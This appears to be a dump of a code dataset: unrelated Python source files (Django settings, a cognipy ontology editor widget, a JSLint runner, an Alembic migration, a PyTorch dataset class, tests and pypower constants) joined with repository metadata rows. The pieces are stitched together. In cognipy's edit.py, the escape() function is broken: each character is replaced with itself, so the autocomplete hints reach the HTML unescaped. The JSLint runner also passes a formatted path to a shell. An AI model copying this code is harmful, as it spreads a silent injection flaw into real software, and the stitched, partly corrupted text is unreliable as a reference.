STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# FIXTURES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#fixture-dirs
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL.
ADMIN_URL = env('DJANGO_ADMIN_URL', default='admin/')
# https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = [
("""Jonathan Giuffrida""", 'me@jcgiuffrida.com'),
]
# https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# Celery
# ------------------------------------------------------------------------------
INSTALLED_APPS += ['palimpsest.taskapp.celery.CeleryAppConfig']
if USE_TZ:
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-timezone
CELERY_TIMEZONE = TIME_ZONE
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-broker_url
CELERY_BROKER_URL = env('CELERY_BROKER_URL')
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_backend
CELERY_RESULT_BACKEND = CELERY_BROKER_URL
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-accept_content
CELERY_ACCEPT_CONTENT = ['json']
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-task_serializer
CELERY_TASK_SERIALIZER = 'json'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_serializer
CELERY_RESULT_SERIALIZER = 'json'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-time-limit
# TODO: set to whatever value is adequate in your circumstances
CELERYD_TASK_TIME_LIMIT = 5 * 60
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-soft-time-limit
# TODO: set to whatever value is adequate in your circumstances
CELERYD_TASK_SOFT_TIME_LIMIT = 60
# DJANGO-ALLAUTH
# https://django-allauth.readthedocs.io/en/latest/configuration.html
# ------------------------------------------------------------------------------
ACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_ADAPTER = 'palimpsest.users.adapters.AccountAdapter'
SOCIALACCOUNT_ADAPTER = 'palimpsest.users.adapters.SocialAccountAdapter'
# django-compressor
# ------------------------------------------------------------------------------
# https://django-compressor.readthedocs.io/en/latest/quickstart/#installation
INSTALLED_APPS += ['compressor']
STATICFILES_FINDERS += ['compressor.finders.CompressorFinder']
# Your stuff...
# ------------------------------------------------------------------------------
| 40.041152
| 100
| 0.626619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,353
| 0.755704
|
3674e5cf5b0c10311bddd2c6d6dd783cd12f6998
| 5,992
|
py
|
Python
|
cognipy/edit.py
|
jswiatkowski/cognipy
|
44a6e32a44253d4965e03a9021a69134c033d041
|
[
"Apache-2.0"
] | 34
|
2020-10-31T23:55:43.000Z
|
2022-02-09T12:46:46.000Z
|
cognipy/edit.py
|
jswiatkowski/cognipy
|
44a6e32a44253d4965e03a9021a69134c033d041
|
[
"Apache-2.0"
] | 38
|
2020-10-31T11:16:01.000Z
|
2022-02-01T12:08:11.000Z
|
cognipy/edit.py
|
jswiatkowski/cognipy
|
44a6e32a44253d4965e03a9021a69134c033d041
|
[
"Apache-2.0"
] | 9
|
2021-03-22T18:42:11.000Z
|
2022-03-17T18:35:06.000Z
|
import ipywidgets as widgets
from traitlets import Unicode, Int, validate
import os
import json
from datetime import datetime,timedelta
from IPython.display import Javascript
from IPython.display import HTML
from cognipy.ontology import Ontology
from IPython.display import clear_output
_JS_initialized = False
def _InitJS():
global _JS_initialized
if _JS_initialized:
return
with open(os.path.dirname(os.path.abspath(__file__))+"/edit.js", 'r') as file:
_JS_initialized = True
display( Javascript(file.read()) )
display( HTML("Welcome to CogniPy") )
class OntoeditWidget(widgets.DOMWidget):
_view_name = Unicode('OntoeditView').tag(sync=True)
_model_name = Unicode('OntoeditModel').tag(sync=True)
_view_module = Unicode('ontoedit').tag(sync=True)
_model_module = Unicode('ontoedit').tag(sync=True)
value = Unicode('').tag(sync=True)
cursor = Int(0).tag(sync=True)
dot = Int(0).tag(sync=True)
hints = Unicode('').tag(sync=True)
hintsX = Int(0).tag(sync=True)
hintT = Unicode('').tag(sync=True)
def escape(html):
"""Returns the given HTML with ampersands, quotes and carets encoded."""
return html.replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"').replace("'", ''')
from functools import reduce
def getcommonletters(strlist):
return ''.join([x[0] for x in zip(*strlist) \
if reduce(lambda a,b:(a == b) and a or None,x)])
def findcommonstart(strlist):
strlist = strlist[:]
prev = None
while True:
common = getcommonletters(strlist)
if common == prev:
break
strlist.append(common)
prev = common
return getcommonletters(strlist)
def CnlEditBox(snap_filename,ontol = None, height='300px'):
_InitJS()
e=widgets.Output()
onto = ontol
def reload_onto():
nonlocal onto,ontol
if ontol is None:
if not os.path.exists(snap_filename):
onto = Ontology("cnl/string","Every thing is a thing.")
else:
onto = Ontology("cnl/file",snap_filename,stop_on_error=False)
with e:
clear_output()
if onto.get_load_error() is not None:
print(str(onto.get_load_error()))
reload_onto()
if not os.path.exists(snap_filename):
open(snap_filename, 'a').close()
def autoCompl(s):
pos=s.rfind('.', 0, len(s))
pos=0 if pos<0 else pos+1
inn=s[pos:len(s)].lstrip(' \n\t')
ac= onto.autocomplete(inn)
return ac
reloading = False
def onChange(change):
# print(change)
nonlocal reloading
if change.name=="value":
if reloading:
reloading = False
while True:
try:
with open(snap_filename, 'w') as file:
file.write(change.new)
break
except:
continue
reload_onto()
elif change.name=="cursor":
s = change.owner.value[0:change.new]
acl=[]
if onto is None:
return
#acl=['!!!SYNTAX ERROR!!!\r\n'+syntax_error]
else:
acl=autoCompl(s)
acl.sort()
options=[escape(x) for x in acl]
oopts = [o for o in acl if o[0]!='<']
change.owner.hints="<br/>".join(options)
pos = max(s.rfind(i) for i in [' ','\t', '\n', '.'])
change.owner.hintsX=pos+1
change.owner.hintT=findcommonstart(oopts)
elif change.name=="dot":
reloading = True
txt = None
with open(snap_filename, 'r') as file:
txt = file.read()
w=OntoeditWidget(
value = txt,
placeholder='Type something',
disabled=False,
layout=widgets.Layout(width='90%', height= '100%'),
style={'description_width': 'initial'}
)
o=widgets.Output()
w.observe(onChange, names=['cursor','value','dot'])
xx= widgets.VBox([e,w,o], layout={'height': height})
xx.getvalue=lambda : w.value
return xx
def CnlQueryForConcept(snap_filename,onto):
_InitJS()
if not os.path.exists(snap_filename):
open(snap_filename, 'a').close()
def autoCompl(onto,s):
pos=s.rfind('.', 0, len(s))
pos=0 if pos<0 else pos+1
return onto.autocomplete("Every-single-thing that is "+s)
def onChange(change):
# print(change)
if change.name=="value":
while True:
try:
with open(snap_filename, 'w') as file:
file.write(change.new)
break
except:
continue
elif change.name=="cursor":
s = change.owner.value[0:change.new]
acl=autoCompl(onto,s)
acl.sort()
options=[escape(x) for x in acl]
oopts = [o for o in acl if o[0]!='<']
change.owner.hints="<br/>".join(options)
pos = max(s.rfind(i) for i in [' ','\t', '\n', '.'])
change.owner.hintsX=pos+1
change.owner.hintT=findcommonstart(oopts)
txt = None
with open(snap_filename, 'r') as file:
txt = file.read()
w=OntoeditWidget(
value = txt,
placeholder='Type something',
disabled=False,
layout=widgets.Layout(width='90%', height= '100%'),
style={'description_width': 'initial'}
)
w.observe(onChange, names=['cursor','value'])
o=widgets.Output()
xx= widgets.VBox([w,o], layout={'height': '100px'})
xx.getvalue=lambda : w.value
return xx
| 32.923077
| 124
| 0.537049
| 482
| 0.080441
| 0
| 0
| 0
| 0
| 0
| 0
| 664
| 0.110814
|
3674f6fa0841c2939ec3314e0546dac6ce11be16
| 1,717
|
py
|
Python
|
params_tuning/ls_iter_n/out_comparator.py
|
bleakTwig/ophs_grasp
|
3e3986154d096a476805269cb818f8c8709a7bda
|
[
"MIT"
] | 3
|
2019-04-21T06:28:00.000Z
|
2022-01-20T15:39:34.000Z
|
params_tuning/ls_iter_n/out_comparator.py
|
bleakTwig/ophs_grasp
|
3e3986154d096a476805269cb818f8c8709a7bda
|
[
"MIT"
] | 1
|
2020-03-08T07:21:52.000Z
|
2022-01-20T15:40:04.000Z
|
params_tuning/ls_iter_n/out_comparator.py
|
bleakTwig/ophs_grasp
|
3e3986154d096a476805269cb818f8c8709a7bda
|
[
"MIT"
] | 2
|
2019-11-13T13:05:06.000Z
|
2020-05-21T18:09:03.000Z
|
INSTANCES = 405
ITERS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 50, 100]
N_ITERS = len(ITERS)
# === RESULTS GATHERING ====================================================== #
# results_m is a [INSTANCES][N_ITERS] matrix to store every test result
results_m = [[0 for x in range(N_ITERS)] for y in range(INSTANCES)]
for I in range(N_ITERS):
fin = open("tests/" + str(ITERS[I]))
out = fin.read()
fin.close()
counter = 0
for line in out.splitlines():
results_m[counter][I] = int(line)
counter += 1
# === CALCULATING AVERAGES =================================================== #
averages = [0.0 for x in range(N_ITERS)]
for I in range(INSTANCES):
for J in range(N_ITERS):
results_m[I][J] = results_m[I][J] - results_m[I][0]
if (results_m[I][N_ITERS-1] != 0):
results_m[I][J] = float(results_m[I][J] / results_m[I][N_ITERS-1])
averages[J] += results_m[I][J]
for J in range(N_ITERS):
averages[J] = averages[J]/INSTANCES
for J in range(N_ITERS-1, 1, -1):
averages[J] -= averages[J-1]
# === PRINTING RESULTS ======================================================= #
print("========================================")
print(" all tests:")
for J in range(1, N_ITERS):
if (ITERS[J] < 10):
print(" " + str(ITERS[J]) + ": " + str(100 * averages[J]) + '%')
elif (ITERS[J] < 100):
print(" " + str(ITERS[J]) + ": " + str(100 * averages[J]) + '%')
else:
print(" " + str(ITERS[J]) + ": " + str(100 * averages[J]) + '%')
print("========================================")
# ============================================================================ #
| 36.531915
| 95
| 0.447292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 539
| 0.31392
|
36770786861f14e087df15911777504f6f97449c
| 1,064
|
py
|
Python
|
glim_extensions/jslint/jslint.py
|
aacanakin/glim-extensions
|
75cf1e857abd717645db85f273650c0d883c55f2
|
[
"MIT"
] | 2
|
2015-01-06T19:21:44.000Z
|
2019-06-14T13:04:51.000Z
|
glim_extensions/jslint/jslint.py
|
aacanakin/glim-extensions
|
75cf1e857abd717645db85f273650c0d883c55f2
|
[
"MIT"
] | 2
|
2015-02-20T07:40:47.000Z
|
2015-02-20T07:44:42.000Z
|
glim_extensions/jslint/jslint.py
|
aacanakin/glim-extensions
|
75cf1e857abd717645db85f273650c0d883c55f2
|
[
"MIT"
] | null | null | null |
import subprocess
import os
from glim.core import Facade
from glim import Log
from glim import paths
DEFAULT_CONFIG = {
'source': os.path.join(paths.APP_PATH, 'assets/js'),
}
class JSLint(object):
def __init__(self, config):
self.config = DEFAULT_CONFIG
for key, value in config.items():
self.config[key] = value
Log.debug("config")
def check(self):
try:
command = 'jslint'
arguments = '%s%s' % (self.config['source'], '/*')
Log.debug("command: %s" % command)
Log.debug("arguments: %s" % arguments)
# find ./public/javascripts/ -name '*.js' -print0 | xargs -0 jslint
cmd = "find %s -name '*.js' -print0 | xargs -0 jslint" % self.config['source']
# cmd = '%s %s' % (command, arguments)
Log.debug("cmd: %s" % cmd)
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
out, err = p.communicate()
Log.info("Linting javascript..")
Log.write(out)
Log.error(err)
except Exception as e:
Log.error(e)
class JSLintFacade(Facade):
accessor = JSLint
| 23.644444
| 81
| 0.641917
| 881
| 0.828008
| 0
| 0
| 0
| 0
| 0
| 0
| 273
| 0.256579
|
3678a2ecf4023c3c9633a878432bfa1234ee6123
| 777
|
py
|
Python
|
migrations/versions/16d42da99601_.py
|
osmearth/tasking-manager
|
b9938496c30eedc44974b29858f803b218c7235b
|
[
"BSD-2-Clause"
] | null | null | null |
migrations/versions/16d42da99601_.py
|
osmearth/tasking-manager
|
b9938496c30eedc44974b29858f803b218c7235b
|
[
"BSD-2-Clause"
] | 3
|
2020-03-24T16:28:34.000Z
|
2021-02-02T21:52:03.000Z
|
migrations/versions/16d42da99601_.py
|
osmearth/tasking-manager
|
b9938496c30eedc44974b29858f803b218c7235b
|
[
"BSD-2-Clause"
] | 1
|
2019-10-02T21:59:00.000Z
|
2019-10-02T21:59:00.000Z
|
"""empty message
Revision ID: 16d42da99601
Revises: deec8123583d
Create Date: 2018-08-23 00:18:10.765086
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '16d42da99601'
down_revision = '30b091260689'
branch_labels = None
depends_on = None
def upgrade():
op.add_column('projects', sa.Column('id_custom_imagery', sa.String(), nullable=True))
op.add_column('projects', sa.Column('id_custom_presets', sa.String(), nullable=True))
op.add_column('projects', sa.Column('id_min_editable_zoom', sa.Integer(), nullable=True))
def downgrade():
op.drop_column('projects', 'id_custom_imagery')
op.drop_column('projects', 'id_custom_presets')
op.drop_column('projects', 'id_min_editable_zoom')
| 25.9
| 93
| 0.731017
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 358
| 0.460746
|
3678d7bd470a57edb6cab13b9b66d70383e92ec4
| 457
|
py
|
Python
|
data_augmentation/eda/image/transforms/normalize.py
|
simran-arora/emmental-tutorials
|
249a82a57be58e960408a45e2e0daa72980d210a
|
[
"MIT"
] | null | null | null |
data_augmentation/eda/image/transforms/normalize.py
|
simran-arora/emmental-tutorials
|
249a82a57be58e960408a45e2e0daa72980d210a
|
[
"MIT"
] | null | null | null |
data_augmentation/eda/image/transforms/normalize.py
|
simran-arora/emmental-tutorials
|
249a82a57be58e960408a45e2e0daa72980d210a
|
[
"MIT"
] | null | null | null |
import torchvision.transforms as transforms
from eda.image.transforms.transform import EdaTransform
class Normalize(EdaTransform):
def __init__(self, mean, std, name=None, prob=1.0, level=0):
self.mean = mean
self.std = std
self.transform_func = transforms.Normalize(mean, std)
super().__init__(name, prob, level)
def transform(self, pil_img, label, **kwargs):
return self.transform_func(pil_img), label
| 28.5625
| 64
| 0.695842
| 353
| 0.772429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
36794b18530c7dfbe909565c90c9010f724df448
| 150
|
py
|
Python
|
scripts.py
|
intendednull/lcu_connectorpy
|
deb1050fe3a3fdc513d63d2ab08ab92bc86ac2f9
|
[
"MIT"
] | null | null | null |
scripts.py
|
intendednull/lcu_connectorpy
|
deb1050fe3a3fdc513d63d2ab08ab92bc86ac2f9
|
[
"MIT"
] | 1
|
2020-03-05T18:54:17.000Z
|
2020-03-05T18:54:17.000Z
|
scripts.py
|
Zer0897/lcu_connectorpy
|
deb1050fe3a3fdc513d63d2ab08ab92bc86ac2f9
|
[
"MIT"
] | 1
|
2020-10-06T01:10:13.000Z
|
2020-10-06T01:10:13.000Z
|
import subprocess as subp
def doc():
subp.run([
'pdoc', '--html', '--overwrite',
'--html-dir', 'docs', 'lcu_connectorpy'
])
| 16.666667
| 47
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 62
| 0.413333
|
3679ff23a41d265863b5224bc85c9f29783e0ef7
| 894
|
py
|
Python
|
lemon_markets/tests/ctest_account.py
|
leonhma/lemon_markets_sdk
|
2739799e6f6b8fa781af8b19e92c32068565cdd3
|
[
"MIT"
] | null | null | null |
lemon_markets/tests/ctest_account.py
|
leonhma/lemon_markets_sdk
|
2739799e6f6b8fa781af8b19e92c32068565cdd3
|
[
"MIT"
] | 1
|
2021-09-29T16:32:49.000Z
|
2021-09-29T16:56:26.000Z
|
lemon_markets/tests/ctest_account.py
|
leonhma/lemon_markets_sdk
|
2739799e6f6b8fa781af8b19e92c32068565cdd3
|
[
"MIT"
] | null | null | null |
from os import environ
from unittest import TestCase
from lemon_markets.account import Account
client_id = environ.get('CLIENT_ID')
client_token = environ.get('CLIENT_TOKEN')
class _TestAccount(TestCase):
def setUp(self):
try:
self.account = Account(client_id, client_token)
except Exception as e:
self._account_exception = e
def skip_if_acc_failed(self):
if not hasattr(self, 'account'):
self.skipTest('Account creation failed!')
def test_create_account(self):
if not hasattr(self, 'account'):
self.fail(self._account_exception)
def test_auth_token_type(self):
self.skip_if_acc_failed()
self.assertIs(type(self.account.access_token), str)
def test_auth_header_type(self):
self.skip_if_acc_failed()
self.assertIs(type(self.account._authorization), dict)
| 27.9375
| 62
| 0.682327
| 714
| 0.798658
| 0
| 0
| 0
| 0
| 0
| 0
| 69
| 0.077181
|
367a9bce756118fb872d4491d7235406c6ce91d1
| 95
|
py
|
Python
|
Right_Angle/trans.py
|
kameranis/IEEExtreme-8.0
|
8ba80224b5218eb759ca91508b4f169788ff5571
|
[
"MIT"
] | null | null | null |
Right_Angle/trans.py
|
kameranis/IEEExtreme-8.0
|
8ba80224b5218eb759ca91508b4f169788ff5571
|
[
"MIT"
] | null | null | null |
Right_Angle/trans.py
|
kameranis/IEEExtreme-8.0
|
8ba80224b5218eb759ca91508b4f169788ff5571
|
[
"MIT"
] | null | null | null |
N=input()
num = [int(raw_input().split()[2]) for i in range(N)]
num = list(set(num))
print num
| 19
| 53
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
367c224eb4987891fba2710e35832c7a65cc5a9c
| 1,799
|
py
|
Python
|
magnetos/crypto/caesar_rail_fence_crack.py
|
restran/magnetos
|
f48dcd7450a46d619dcbe64c11c9aa1c119cd307
|
[
"MIT"
] | 20
|
2018-10-16T05:00:52.000Z
|
2022-02-23T01:56:04.000Z
|
magnetos/crypto/caesar_rail_fence_crack.py
|
restran/magnetos
|
f48dcd7450a46d619dcbe64c11c9aa1c119cd307
|
[
"MIT"
] | null | null | null |
magnetos/crypto/caesar_rail_fence_crack.py
|
restran/magnetos
|
f48dcd7450a46d619dcbe64c11c9aa1c119cd307
|
[
"MIT"
] | 12
|
2018-10-16T05:00:32.000Z
|
2021-12-13T08:58:06.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""
凯撒困在栅栏里了,需要你的帮助。
sfxjkxtfhwz9xsmijk6j6sthhj
flag格式:NSFOCUS{xxx},以及之前的格式
"""
def rail_fence(e):
# e = 'tn c0afsiwal kes,hwit1r g,npt ttessfu}ua u hmqik e {m, n huiouosarwCniibecesnren.'
elen = len(e)
field = []
for i in range(2, elen):
if elen % i == 0:
field.append(i)
output = []
for f in field:
b = elen / f
result = {x: '' for x in range(b)}
for i in range(elen):
a = i % b
result.update({a: result[a] + e[i]})
d = ''
for i in range(b):
d = d + result[i]
output.append(d)
print('分为\t' + str(f) + '栏时,解密结果为:' + d)
return output
class Caesar(object):
"""docstring for caesar"""
@classmethod
def convert(cls, c, key, start='a', n=26):
a = ord(start)
offset = ((ord(c) - a + key) % n)
return chr(a + offset)
@classmethod
def encode(cls, s, key):
o = ""
for c in s:
if c.islower():
o += cls.convert(c, key, 'a')
elif c.isupper():
o += cls.convert(c, key, 'A')
else:
o += c
return o
@classmethod
def decode(cls, s, key):
return cls.encode(s, -key)
def main():
key_prefix = ['flag', 'key', 'Key', 'Flag', 'nctf']
# data = 'T_ysK9_5rhk__uFMt}3El{nu@E '
data = 'bcwwylkojh{eznpjbawgoaueee}'
output = rail_fence(data)
for t in output:
for key in range(26):
d = Caesar.decode(t, key)
tmp = d.lower()
print(d)
for x in key_prefix:
if tmp.startswith(x):
print(d)
if __name__ == '__main__':
main()
| 22.4875
| 97
| 0.487493
| 585
| 0.312333
| 0
| 0
| 515
| 0.27496
| 0
| 0
| 433
| 0.23118
|
367c714d55fb20ba8891983bb594b981f3b9fa1a
| 470
|
py
|
Python
|
backend/client/admin.py
|
katserafine/GenieHub
|
b7542b5b2a5dfc137b763a08b64d43e1dbe53af7
|
[
"MIT"
] | 1
|
2020-06-24T04:44:33.000Z
|
2020-06-24T04:44:33.000Z
|
backend/client/admin.py
|
katserafine/GenieHub
|
b7542b5b2a5dfc137b763a08b64d43e1dbe53af7
|
[
"MIT"
] | null | null | null |
backend/client/admin.py
|
katserafine/GenieHub
|
b7542b5b2a5dfc137b763a08b64d43e1dbe53af7
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.utils.html import format_html
from django.contrib.auth.models import Permission
from .models import *
# Register your models here.
admin.site.register(projectWorker)
admin.site.register(project)
admin.site.register(leadContact)
class ClientAdmin(admin.ModelAdmin):
list_display = ('name', 'inactive')
list_display_links = list_display
list_filter = ('name', 'inactive')
admin.site.register(Client, ClientAdmin)
| 29.375
| 49
| 0.785106
| 153
| 0.325532
| 0
| 0
| 0
| 0
| 0
| 0
| 60
| 0.12766
|
367eac1a7db087dfdc9d4b14754a4dfc278aae39
| 1,310
|
py
|
Python
|
dataset.py
|
donghankim/comma_ai_speed_challenge
|
b75c1dcb556ffb582c20b4540938989e7ecaadb7
|
[
"MIT"
] | null | null | null |
dataset.py
|
donghankim/comma_ai_speed_challenge
|
b75c1dcb556ffb582c20b4540938989e7ecaadb7
|
[
"MIT"
] | null | null | null |
dataset.py
|
donghankim/comma_ai_speed_challenge
|
b75c1dcb556ffb582c20b4540938989e7ecaadb7
|
[
"MIT"
] | null | null | null |
import os
import pandas as pd
import numpy as np
import torch
from torchvision import transforms
from torch.utils.data import Dataset
import matplotlib.pyplot as plt
from skimage import io
import pdb
class FrameDataset(Dataset):
def __init__(self, csv_file, train_dir):
self.labels = pd.read_csv(csv_file)
self.train_dir = train_dir
self.transform = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize((66,220)),
transforms.ToTensor(),
transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]),
])
def show_img(self, img, denormalize = True):
inv_normalize = transforms.Normalize(mean=[-0.485/0.229, -0.456/0.224, -0.406/0.225], std=[1/0.229, 1/0.224, 1/0.225])
if denormalize:
img = inv_normalize(img)
plt.imshow(np.transpose(img.numpy(), (1,2,0)))
plt.show()
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
img_path = os.path.join(self.train_dir, self.labels.iloc[index][0])
image = io.imread(img_path)
y_label = torch.tensor(float(self.labels.iloc[index][1]))
if self.transform:
image = self.transform(image)
return (image, y_label)
| 28.478261
| 126
| 0.625954
| 1,104
| 0.842748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
367f5454bf00d15f020b33f86f78e7b9b5ef7a9d
| 1,114
|
py
|
Python
|
pairwise/pairwise_theano.py
|
numfocus/python-benchmarks
|
75db94b33e3d8bd2d6504e21a9cb74e79e04b4f9
|
[
"MIT"
] | 31
|
2015-05-15T17:53:50.000Z
|
2022-01-14T12:49:19.000Z
|
pairwise/pairwise_theano.py
|
nouiz/python-benchmarks
|
73ba6479f4243679dc06b6d204b5db3226e0a5a6
|
[
"MIT"
] | null | null | null |
pairwise/pairwise_theano.py
|
nouiz/python-benchmarks
|
73ba6479f4243679dc06b6d204b5db3226e0a5a6
|
[
"MIT"
] | 8
|
2015-02-25T09:12:03.000Z
|
2020-12-28T18:06:22.000Z
|
# Authors: James Bergstra
# License: MIT
import theano
import theano.tensor as TT
def pairwise_theano_tensor_prepare(dtype):
X = TT.matrix(dtype=str(dtype))
dists = TT.sqrt(
TT.sum(
TT.sqr(X[:, None, :] - X),
axis=2))
name = 'pairwise_theano_broadcast_' + dtype
rval = theano.function([X],
theano.Out(dists, borrow=True),
allow_input_downcast=True, name=name)
rval.__name__ = name
return rval
def pairwise_theano_blas_prepare(dtype):
X = TT.matrix(dtype=str(dtype))
X_norm_2 = (X ** 2).sum(axis=1)
dists = TT.sqrt(2 * X_norm_2 - TT.dot(X, X.T))
name = 'pairwise_theano_blas_' + dtype
rval = theano.function([X],
theano.Out(dists, borrow=True),
allow_input_downcast=True, name=name)
rval.__name__ = name
return rval
benchmarks = (
pairwise_theano_tensor_prepare('float32'),
pairwise_theano_tensor_prepare('float64'),
pairwise_theano_blas_prepare('float32'),
pairwise_theano_blas_prepare('float64'),
)
| 28.564103
| 64
| 0.611311
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 126
| 0.113106
|
367fa896207ba09a4df55eba008b8c69a5715343
| 3,396
|
py
|
Python
|
pandapower/pypower/idx_bus.py
|
bergkvist/pandapower
|
450bbd99888e7e5913905b20b848ee1cfa669ee8
|
[
"BSD-3-Clause"
] | 1
|
2020-04-09T08:03:48.000Z
|
2020-04-09T08:03:48.000Z
|
pandapower/pypower/idx_bus.py
|
bergkvist/pandapower
|
450bbd99888e7e5913905b20b848ee1cfa669ee8
|
[
"BSD-3-Clause"
] | 1
|
2019-04-17T14:58:53.000Z
|
2019-04-17T14:58:53.000Z
|
pandapower/pypower/idx_bus.py
|
gdgarcia/pandapower
|
630e3278ca012535f78282ae73f1b86f3fe932fc
|
[
"BSD-3-Clause"
] | 1
|
2020-11-03T01:40:38.000Z
|
2020-11-03T01:40:38.000Z
|
# -*- coding: utf-8 -*-
# Copyright 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
# Copyright (c) 2016-2020 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
"""Defines constants for named column indices to bus matrix.
Some examples of usage, after defining the constants using the line above,
are::
Pd = bus[3, PD] # get the real power demand at bus 4
bus[:, VMIN] = 0.95 # set the min voltage magnitude to 0.95 at all buses
The index, name and meaning of each column of the bus matrix is given
below:
columns 0-12 must be included in input matrix (in case file)
0. C{BUS_I} bus number (1 to 29997)
1. C{BUS_TYPE} bus type (1 = PQ, 2 = PV, 3 = ref, 4 = isolated)
2. C{PD} real power demand (MW)
3. C{QD} reactive power demand (MVAr)
4. C{GS} shunt conductance (MW at V = 1.0 p.u.)
5. C{BS} shunt susceptance (MVAr at V = 1.0 p.u.)
6. C{BUS_AREA} area number, 1-100
7. C{VM} voltage magnitude (p.u.)
8. C{VA} voltage angle (degrees)
9. C{BASE_KV} base voltage (kV)
10. C{ZONE} loss zone (1-999)
11. C{VMAX} maximum voltage magnitude (p.u.)
12. C{VMIN} minimum voltage magnitude (p.u.)
columns 13-16 are added to matrix after OPF solution
they are typically not present in the input matrix
(assume OPF objective function has units, u)
13. C{LAM_P} Lagrange multiplier on real power mismatch (u/MW)
14. C{LAM_Q} Lagrange multiplier on reactive power mismatch (u/MVAr)
15. C{MU_VMAX} Kuhn-Tucker multiplier on upper voltage limit (u/p.u.)
16. C{MU_VMIN} Kuhn-Tucker multiplier on lower voltage limit (u/p.u.)
additional constants, used to assign/compare values in the C{BUS_TYPE} column
1. C{PQ} PQ bus
2. C{PV} PV bus
3. C{REF} reference bus
4. C{NONE} isolated bus
@author: Ray Zimmerman (PSERC Cornell)
@author: Richard Lincoln
"""
# define bus types
PQ = 1
PV = 2
REF = 3
NONE = 4
# define the indices
BUS_I = 0 # bus number (1 to 29997)
BUS_TYPE = 1 # bus type
PD = 2 # Pd, real power demand (MW)
QD = 3 # Qd, reactive power demand (MVAr)
GS = 4 # Gs, shunt conductance (MW at V = 1.0 p.u.)
BS = 5 # Bs, shunt susceptance (MVAr at V = 1.0 p.u.)
BUS_AREA = 6 # area number, 1-100
VM = 7 # Vm, voltage magnitude (p.u.)
VA = 8 # Va, voltage angle (degrees)
BASE_KV = 9 # baseKV, base voltage (kV)
ZONE = 10 # zone, loss zone (1-999)
VMAX = 11 # maxVm, maximum voltage magnitude (p.u.)
VMIN = 12 # minVm, minimum voltage magnitude (p.u.)
# included in opf solution, not necessarily in input
# assume objective function has units, u
LAM_P = 13 # Lagrange multiplier on real power mismatch (u/MW)
LAM_Q = 14 # Lagrange multiplier on reactive power mismatch (u/MVAr)
MU_VMAX = 15 # Kuhn-Tucker multiplier on upper voltage limit (u/p.u.)
MU_VMIN = 16 # Kuhn-Tucker multiplier on lower voltage limit (u/p.u.)
# Additional pandapower extensions to ppc
